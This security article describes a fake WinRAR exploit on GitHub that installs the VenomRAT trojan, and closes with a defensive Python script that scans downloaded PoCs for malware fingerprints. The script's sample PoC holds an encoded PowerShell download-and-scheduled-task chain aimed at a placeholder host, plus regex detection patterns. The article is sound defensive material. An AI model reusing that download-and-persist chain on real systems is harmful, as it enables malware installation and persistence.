A malicious actor has created a fake proof-of-concept (PoC) exploit for a recently patched WinRAR vulnerability and uploaded it to GitHub, hoping to infect unsuspecting researchers and cybercriminals with the VenomRAT malware.
The fake PoC exploit targets the CVE-2023-40477 vulnerability, an arbitrary code execution vulnerability that can be triggered when specially crafted RAR files are opened on WinRAR before version 6.23. Trend Micro’s Zero Day Initiative discovered and disclosed the vulnerability to WinRAR on June 8, 2023, but did not publicly disclose it until August 17, 2023. WinRAR fixed the flaw in version 6.23, which was released on August 2.
The vulnerability is considered notable because WinRAR is a popular Windows file-archiving utility that has over 500 million users worldwide. A successful exploitation of the flaw could allow an attacker to execute arbitrary code on the victim’s system and take full control of it.
Fake PoC Script Delivers VenomRAT
A threat actor operating under the name “whalersplonk” moved fast (within four days of the public disclosure) to take advantage of the opportunity by spreading malware under the guise of exploit code for the new WinRAR vulnerability. The attacker uploaded the malicious code to GitHub on August 21, 2023, and included a summary in the README file and a Streamable video demonstrating how to use the PoC, which lent further legitimacy to the malicious package.
However, Unit 42, a team of researchers from Palo Alto Networks, reported that the fake Python PoC script is actually a modification of a publicly available exploit for another flaw, CVE-2023-25157, a critical SQL injection flaw impacting GeoServer.
When executed, instead of running the exploit, the PoC creates a batch script that downloads an encoded PowerShell script and executes it on the host. That script downloads the VenomRAT malware and creates a scheduled task to run it every three minutes.
VenomRAT Infections
VenomRAT is a remote access trojan (RAT) that can be used to steal credentials, monitor keystrokes, execute commands, and deploy other payloads on infected devices. It appeared for sale in Dark Web forums in 2022 and has been used in various cyberattacks since then.
Once VenomRAT is launched on a Windows device, it starts a key logger that records all key presses and writes them to a locally stored text file. Next, the malware establishes communication with the command-and-control (C2) server, from which it receives one of the following nine commands for execution on the infected device:
- plu_gin: Activates a registry-stored plugin.
- HVNCStop: Kills the “cvtres” process.
- loadofflinelog: Sends offline key logger data from %APPDATA%.
- save_Plugin: Saves a plugin to the registry under a hardware ID.
- runningapp: Displays active processes.
- keylogsetting: Updates the key log file in %APPDATA%.
- init_reg: Deletes subkeys in the Software registry under a hardware ID.
- Po_ng: Measures the time between sending a PING to the C2 server and receiving this command.
- filterinfo: Lists installed apps and active processes from the registry.
As the malware can be used to deploy other payloads and steal credentials, anyone who executed this fake PoC should change their passwords for all sites and environments on which they have accounts.
How to Protect Yourself from Fake PoCs
The attack is no longer active, but it once again highlights the risks of sourcing PoCs from GitHub and running them without additional scrutiny to ensure they’re safe. The threat actor also used social engineering techniques to lure potential victims by creating a fake Twitter account and posting about the PoC.
To protect yourself from fake PoCs, you should always:
- Verify the source and reputation of the PoC before downloading or executing it.
- Use a sandbox or virtual machine to test the PoC in an isolated environment.
- Use antivirus software and a firewall to detect and block malicious activity.
- Update your software regularly to patch known vulnerabilities.
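The infection chain described above (a Python "PoC" that writes a batch file, launches an encoded PowerShell command, and registers a short-interval scheduled task) leaves static fingerprints that can be checked before anything is run, which is the kind of scrutiny the list above calls for. The script below is an added illustration for this article, not the threat actor's file and not Unit 42's tooling: it scans a downloaded PoC's text for those fingerprints, decodes any -EncodedCommand argument it finds (PowerShell expects Base64 of a UTF-16LE string), and scans the decoded body as well. The indicator regexes are the author's own choices, and the sample PoC is constructed for the example; its embedded PowerShell is a harmless placeholder that only carries the indicator strings.

```python
"""Static triage of a downloaded "PoC" before anyone runs it.

Added illustration; not the fake PoC itself and not a published ruleset.
"""
import base64
import re

# Indicators in the raw source. Assumption: these patterns are the author's
# own choices for this example, not a vendor or community signature set.
SOURCE_INDICATORS = {
    "writes_batch_file": re.compile(r"open\([^)]*\.(?:bat|cmd)['\"]", re.I),
    "encoded_powershell": re.compile(
        r"powershell(?:\.exe)?[^\n]*-(?:e|ec|enc|encodedcommand)\b", re.I),
    "spawns_shell": re.compile(
        r"\b(?:os\.system|subprocess\.(?:run|Popen|call))\(", re.I),
}

# Indicators checked inside decoded PowerShell bodies.
DECODED_INDICATORS = {
    "downloads_payload": re.compile(
        r"(?:Invoke-WebRequest|DownloadString|DownloadFile|iwr|curl)\b", re.I),
    "creates_scheduled_task": re.compile(
        r"\bschtasks\b[^\n]*/create|Register-ScheduledTask", re.I),
    # a task repeating every few minutes, as the article describes
    "short_repeat_interval": re.compile(r"/sc\s+minute\s+/mo\s+[1-5]\b", re.I),
}


def decode_powershell_args(text):
    """Return the decoded body of every -EncodedCommand argument in text.
    PowerShell takes Base64 of UTF-16LE, so that is how it is decoded here."""
    decoded = []
    pattern = r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})"
    for match in re.finditer(pattern, text, re.I):
        try:
            decoded.append(base64.b64decode(match.group(1)).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid encoded PowerShell; leave it for manual review
    return decoded


def triage_poc(source):
    """Return the sorted indicator names triggered by a PoC's text, scanning
    both the raw source and any encoded PowerShell embedded in it."""
    findings = {name for name, rx in SOURCE_INDICATORS.items() if rx.search(source)}
    for body in decode_powershell_args(source):
        findings.update(name for name, rx in DECODED_INDICATORS.items() if rx.search(body))
    return sorted(findings)


def build_sample_poc():
    """Constructed stand-in for the fake PoC: a Python file that never touches
    a RAR archive and instead drops a batch file running encoded PowerShell.
    The PowerShell is a placeholder (example.invalid, no real payload)."""
    ps = ("Invoke-WebRequest -Uri 'https://example.invalid/placeholder' "
          "-OutFile $env:APPDATA\\placeholder.exe; "
          "schtasks /create /sc minute /mo 3 /tn Placeholder /tr $env:APPDATA\\placeholder.exe")
    encoded = base64.b64encode(ps.encode("utf-16-le")).decode("ascii")
    return (
        "import os\n"
        "# 'exploit' that never opens a RAR file\n"
        "with open('run.bat', 'w') as f:\n"
        f"    f.write('powershell -enc {encoded}')\n"
        "os.system('run.bat')\n"
    )


if __name__ == "__main__":
    for name in triage_poc(build_sample_poc()):
        print("flagged:", name)
```

Point triage_poc at the text of any script you are about to run; a genuine exploit for a file-format bug has no reason to drop batch files, spawn encoded PowerShell, or register scheduled tasks, so even one of these findings is grounds to read the file line by line in a sandbox rather than execute it. A clean result is not proof of safety, only the absence of these particular fingerprints.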